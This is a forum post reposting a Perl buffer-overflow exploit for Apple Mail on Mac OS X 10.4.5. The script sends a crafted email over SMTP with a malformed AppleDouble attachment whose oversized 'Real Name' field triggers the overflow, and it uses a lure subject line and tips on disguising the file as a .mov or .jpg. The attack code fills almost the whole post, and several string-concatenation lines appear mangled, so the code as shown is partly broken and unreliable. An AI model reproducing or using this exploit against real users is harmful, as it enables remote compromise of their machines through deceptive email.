Pages: [1]   Go Down
Author Topic: Apple Mac OS X 10.4.5 (Real Name) Buffer Overflow Exploit from milw0rm  (Read 7826 times)
Global Moderator
Jr. Member
Posts: 15

« on: May 22, 2006, 11:25:43 am »

# Code by Kevin Finisterre kf_lists[at]digitalmunition[dot]com
# Version 2.0.7 (746.2) on OSX 10.4.5 Build 8H14 + Security Update 2006-001 (PowerPC) v1.0
# RFC-1740 MIME-based Mac file buffer overflow
# AppleSingle file header:
# [4 byte magic number][4 byte version number][16 bytes of filler][2 byte number of entries][Entry...]
# Entry descriptor for each Entry:
# [4 byte entry id][4 byte offset][4 byte length]
# Real Name entry id is 0x03, Finder Info is 0x09 and Resource Fork is 0x02
# If this exploit is not working clean out your ~/Library/Mail Downloads folder
# ./ yourmac\
use IO::Socket;
use MIME::Base64;
$hostName = $ARGV[0];
$emailaddy = $ARGV[1];

$sock = IO::Socket::INET->new (Proto => "tcp", PeerAddr => $hostName, PeerPort => 25, Type => SOCK_STREAM);
$sock or die "no socket :$!\n";
print $sock "EHLO []\r\n" .
"MAIL FROM:<root>\r\n" .   # This needs to be valid for what ever server you are using.
"RCPT TO:<$emailaddy>\r\n" .         # Target machine goes email address here.
"DATA\r\n" .
"Mime-Version: 1.0 (Apple Message framework v746.2)\r\n" .
"To: kfinisterre\\r\n" .
"Message-Id: <1AE65A5B-6E3A-479B-8ECB-8BC4D959A69A\\r\n" .
"Content-Type: multipart/mixed; boundary=Apple-Mail-3-188295813\r\n" .
"From: root <root>\r\n" .
"Subject: Dude you have to see this shit!\r\n" .
"Date: Mon, 6 Mar 2006 23:04:12 -0500\r\n" .
"X-Mailer: Apple Mail (2.746.2)\r\n" .
"\r\n" .
"\r\n" .
"--Apple-Mail-3-188295813\r\n" .
"Content-Type: multipart/appledouble;\r\n" .
"\tboundary=Apple-Mail-4-188295813\r\n" .
"Content-Disposition: attachment\r\n" .
"\r\n" .
"\r\n" .
"--Apple-Mail-4-188295813\r\n" .
"Content-Transfer-Encoding: base64\r\n" .
"Content-Type: application/applefile;\r\n" .
"\tname=\"\"\r\n" .
"Content-Disposition: attachment;\r\n" .
"\tfilename*\r\n" .

$retaddr = "\x41\x42\x43\x44";  # Shit the spec says printable ASCII!

$bufferz  =

"\x00\x05\x16\x07".   # AppleDouble Magic Number
"\x00\x02\x00\x00".   # Version 2
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".   # 16 Bytes of <null> filler
"\x00\x03\x00\x00".   # Number of entries (3)
"\x00\x09\x00\x00".   # Entry ID 9 is for 'Finder Info'
"\x00\x3e\x00\x00".   # Start of Finder Info data is at file offset 0x3e
"\x00\x0a\x00\x00".   # Length of Finder Info is 0x0a or 10
"\x00\x03\x00\x00".   # Entry ID 3 is for 'Real Name'
"\x00\x48\x00\x00".   # Start of Real Name data is at file offset 0x48
"\x00\xf5\x00\x00".   # Length of Real Name is 0xf5 or 245
"\x00\x02\x00\x00".   # Entry ID 2 is for 'Resource Fork'
"\x01\x3d\x00\x00".   # Start of Resource Fork is at file offset 0x013d
"\x05\x3a\x00\x00".   # Length of Resource fork is 0x053a
"\x00\x00\x00\x00".   # <null> filler
"\x00\x00\x00\x00".   # <null> filler
"aa" x 109 . "0000" . "1111" .  "2222" . "$retaddr" x 1 . "3333" . "" . # remember this length is hard coded above.
# Anything over 11 chars is here not seen by the user try Something like
# or don't forget the trailing '.' both .mov and .jpg work well from a Visual standpoint
# No fscking clue what this is... it is stolen from MetaSploit.
# I think its just a resource fork.

print $sock encode_base64($bufferz) .
"\r\n" .
"--Apple-Mail-4-188295813\r\n" .
"Content-Transfer-Encoding: 8bit\r\n" .
"Content-Id: <1A628FD3-CED7-4C69-B5A6-5ABA7AEB2891\@local>\r\n" .
"Content-Type: video/quicktime;\r\n" .
"\tx-mac-type=0;\r\n" .
"\tx-unix-mode=0755;\r\n" .
"\tx-mac-creator=0;\r\n" .
"\tname=\"\"\r\n" .
"Content-Disposition: attachment;\r\n" .
"\tfilename*;\r\n" .
"\r\n" . "Z" x 90000 . "\r\n" .
"--Apple-Mail-4-188295813--\r\n" .
"\r\n" .
"--Apple-Mail-3-188295813--\r\n" .
sleep 2;  # Allow enough time for the message to process before leaving

# [2006-03-13]

Pages: [1]   Go Up
Jump to: